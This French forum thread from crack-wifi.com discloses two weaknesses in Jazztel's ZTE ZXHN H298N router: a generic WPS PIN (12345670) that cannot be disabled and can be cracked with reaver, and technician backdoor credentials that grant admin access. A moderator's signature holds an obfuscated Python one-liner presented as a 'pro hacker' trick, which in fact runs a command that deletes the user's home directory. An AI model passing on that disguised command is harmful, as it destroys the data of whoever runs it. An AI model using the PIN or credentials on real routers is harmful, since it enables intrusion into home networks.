Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 11-10-2014 13:12:20

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 246

ZTE ZXHN H298N - ISP jazztel : faille WPS + backdoor

1413029361.png

Plantons un peu le décors:
  jazztel revient en force en s'attaquant depuis plus ou moins un an au marché de la fibre optique en Espagne avec des offres agressives .
  Du coup la compagnie qui était était au bord de la faillite s'est complètement repositionnée sur le marché de l'adsl ibérique.
  Elle est presque au niveau d'orange en termes de foyers équipés, et elle pourrait même ravir à ces dernier la place de troisième ISP du pays à la vue des derniers résultats et des rythmes de croissances
  Le créneau de jazztel c'est de proposer deux types d'abonnements :
  abonnements fibre optique à  50 MB à moins de 30 € pour étudiants etc..
  abonnements de hautes prestations pour familles heureuses et nombreuses de 200 MB 

   Pour s'équiper en routeurs l'ISP a choisit de faire appel à ZTE, consortium chinois sous la houlette du ministère chinois de la recherche spatiale, connu pour ses box et ses téléphone mozilla os petits prix...
  ... et peut être aussi pour ne pas être à la pointe en matière de sécurité. tongue
  * Prise de contrôle à distance via telnet/SNMP des router ZTE-ZXV1O W300
  * Escalada de privilèges sur ZTE WXV10 W300


  Ce coup-ci c'est donc du ZHXN H298N qu'il s'agit et qui se retrouve donc massivement implanté en espagne...
Le routeur est facilement identifiable en regardant les probes:

F0:84:C9:XX:XX:XX   JAZZTEL_AKXX 11 -53 *  *  2 (Configured) *  ZXHN H298N *  123456789012347 *  ADSL Modem/Router *  PBC

 

  J'ai pu brièvement tester un peu le routeur et j'ai pu constater deux failles permettant à un attaquant extérieur de pénétrer sur le réseau et puis d'en prendre le contrôle.

       
     
    1 . FAILLE WPS PERMANANTE

  Comme il semble que ce soit l'habitude avec les routeurs ZTE, le WPS vient activé par défaut avec comme PIN générique 12345670

1413022356.png

  Il faut un peu insister et mettre l'argument -n avec reaver mais pas de problèmes, le routeur vas vous donner gentiment la clef WPA.

  On ne va pas insister encore une fois sur le fait que nous sommes en 2014, bientôt 2015, et qu'un ISP lâche dans la nature des routeurs avec WPS activé et PIN 12345670.
  Les ingénieurs de jaztell on du faire la même école que ceux de bouygues big_smile
  Parce que là aussi, quand on veut désactiver le WPS, il y a comme un problème...
 
  Dans "sécurité" vous pouvez seulement changer le pass

1413023825.png

  Et pour ce qui est des options WPS vous pouvez seulement utiliser le bouton virtuel PBC

1413024008.png

   Il est donc impossible de désactiver ou modifier le WPS mode PIN et la sécurité su le réseau wireless est nulle.
   Pas de solution possible ( à part désactiver le réseau wireless ou jeter le routeur à la poubelle et vous en procurer un autre )





        2 . BACKDOOR DANS L'INTERFACE DE CONFIGURATION

  Si la première faille est très certainement imputable au fabricant chinois, cette deuxième faille est imputablen à l'ISP jaztell.

  Après s'être introduit sur le réseau en quelques secondes grâce au PIN, l'accès à l'interface de configuration http du routeur ce fait normalement avec admin:admin avec la configuration d'usine.
  Jaztell a voulu faire les choses bien :

1413024768.png

  je traduis en gros ce qui est surligné : "Pour configurer votre routeur il faut mettre 192.168.1.1 dans votre barre de navigation et rentrer les identifiants personnalisés qui vous ont été donnés par le technicien le jour de l’installation"
  les users et pass sont de robustes chaines de caractères ascii majuscules+minuscules et en plus le routeur est équipé d'un système de défense qui bloque pendant une minute l'accès après trois essais manqués
Toute attaque par dictionnaire est donc illusoire

1413025238.png

  De bonnes intentions mais vous connaissez le dicton: les chemins qui mènent à l'enfer sont pavés de bonnes intentions...
  Il est de notoriété publique que les techniciens de jaztell utilisent un compte spécial pour configurer les routeurs.

1413026821.png

Configuracion modem wifi ZXHN H108N

  Même si il s'agit d'une autre modèle, c'est du ZTE avec une surcouche jazztel, essayons donc avec avanzado:avanzado

1413027437.png

Et nous voilà dans la conf....

1413027554.png

... en tant que "supporter"

1413027713.png

ce qui revient à être administrateur

1413027980.png
1413028020.png

Au moins il est possible de changer le pass des techniciens... tongue

Salut et bon appétit! smile

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 11-10-2014 14:56:07

spawn
Modérateur
Inscription : 14-01-2011
Messages : 1 006

Re : ZTE ZXHN H298N - ISP jazztel : faille WPS + backdoor

ça devient triste :'(
Merci pour ces infos, lampiweb a l'air de bien se porter !


@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

Hors Ligne

#3 14-10-2014 17:11:14

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 246

Re : ZTE ZXHN H298N - ISP jazztel : faille WPS + backdoor

De rien Spawn smile
Lampiweb va bien; le forum vient de passer par une phase de transition car lampi a décidé d'arrêter de l’administrer/le modérer.
C'est donc maintenant maripuri qui est administratrice du forum et tout se passe très bien.
smile

Hors Ligne

#4 18-10-2014 00:10:57

M1ck3y
Administrateur
Lieu : Lost in the darkness
Inscription : 14-02-2008
Messages : 6 354

Re : ZTE ZXHN H298N - ISP jazztel : faille WPS + backdoor

Et un de plus au tableau de chasse wink

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Sujets similaires

Discussion Réponses Vues Dernier message
0 160 29-10-2016 11:12:05 par sukawa2007
11 441 05-09-2016 15:07:25 par MiscL
5 1850 13-07-2016 15:56:51 par jaues007
81 15752 29-06-2016 10:27:55 par Fab955
21 8230 15-01-2016 13:53:04 par kcdtv

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.022 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]